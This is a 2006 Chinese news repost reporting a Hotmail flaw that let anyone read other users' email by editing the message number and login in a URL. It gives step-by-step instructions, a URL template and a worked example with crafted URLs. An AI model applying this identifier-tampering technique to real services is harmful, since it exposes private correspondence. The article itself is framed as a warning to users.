Hotmail发现严重安全漏洞

王朝other·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

近日,一位Hotmail用户发现,通过简单的更改地址中的邮件编号等信

息就可以浏览它人的邮件内容。由于邮件编号都有一定的规则,所以很容

易猜出来。要完成此项工作,你必须拥有2个Hotmail信箱。

用于偷看他人邮件的地址为:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%

2fgetmsg&hm___qs=%26msg%3dMSGXXXXXXXXX% 2e(X)X%26start%3d1% 26len%3d99999999999%26login%

3dUSERNAME%26domain%3dhotmail%2ecom

其中XXXXXXXXX为邮件编号,USERNAME为用户账号,(X)X为介于0和59

之间的第二编码。

比如说,你有一个名为r00tarded@hotmail.com的信箱。首先登录此信

箱,打开任何一封邮件,此时地址栏中的地址将是:

http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=5691b2b4e104176111971aa0fbb1274&msg=MSG998000947.3&start=197078&len=1060&msgread=1&mfs=182

这封电子邮件的编号就是MSG998000947.3。把地址拷贝下来,注销。

然后登录另一个信箱。把刚才的那封邮件的编号和账号插入地址栏:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998000947%2e3%26start%3d1%26len%3d99999999999%26login%

3dr00tarded%26domain%3dhotmail%2ecom

回车。看到什么了?对,r00tarded@hotmail.com中的那封邮件的内容

提请广大Hotmail用户注意,此漏洞到本站发稿时为止仍未修复。(张

永刚)

(责编:Cathy)

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有  導航